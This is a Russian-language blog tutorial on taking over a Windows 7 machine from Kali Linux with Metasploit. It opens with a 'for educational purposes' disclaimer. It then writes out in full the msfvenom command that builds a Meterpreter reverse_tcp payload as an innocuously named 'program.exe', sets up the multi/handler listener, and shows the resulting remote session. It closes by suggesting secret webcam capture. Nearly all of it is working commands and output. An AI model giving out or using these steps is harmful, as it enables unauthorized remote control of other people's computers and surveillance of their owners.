Thank you for reading this post, don't forget to subscribe!
Kali Linux является производным от Debian Linux и он в основном используется для проникновения. Он имеет более чем 300 предустановленных программ тестирования проникновения. Он поддерживается платформой Metasploit Framework в проекте Metasploit, инструмент для разработки и выполнения эксплойтов. Давайте начнем с хака Windows с Кали Linux. Стоит отметить, что, мы пишем этот пост только в целях образования.
Детали исходной машины:
Kali Linux
1 2 3 |
root@kali:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:/# |
Целевая машина, используемая для взлома:
1 |
Windows 7 Ultimate SP1 |
Шаг 1 . Создание нагрузки
Payload представляет собой программу, которая похожа как вирус или троян, которые выполняются на удаленной машине для цели взлома. Для создания полезной нагрузки используется команды написанные ниже, которые будут взламывать windows с Kali Linux.
1 2 3 4 5 6 7 8 9 10 |
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe root@kali:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe |
С помощью команды ls мы подтвердили, что наша программа Payload успешно создана в указанном месте.
Шаг 2: Запустите команду mfsconsole, которая запустит запрос msf.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
root@kali:# msfconsole .,,. . .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > |
Шаг 3: Для использования мы использовали следующие детали:
- Порт 4444: вы можете использовать по вашему выбору
- LHOST IP: IP 192.168.189.128 с Kali Linux. Узнать IP, который использует ваша машина, можно с помощью команды Кали.
Теперь дайте следующую команду в строке msf “use exploit/multi/handler”
1 2 |
msf > use exploit/multi/handler msf exploit(handler) > |
Затем дайте команду “set payload windows/meterpreter/reverse_tcp” в следующей строке:
1 2 |
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp |
Теперь установите локальный IP и порт, используя команду lhost и lport, как показано ниже:
1 2 3 4 |
msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444 |
и, наконец, используйте команду.
1 2 3 4 |
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... |
Теперь вам нужно выполнить команду “program.exe” на машине с Windows, как только она выполняется на целевой машине, вы можете в состоянии установить сессию meterpreter. Просто наберите SysInfo, чтобы получить детали взломанной машины с Windows.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 |
После того как вы успешно получите детали, вы можете сделать больше в использовании или получить более подробную информацию с помощью команды “help“, которая покажет все варианты, с помощью которых вы можете взломать систему, например, чтобы получить команду использовать веб-камера оснастки “webcam_snap” так же, как вы можете использовать многие доступные опция.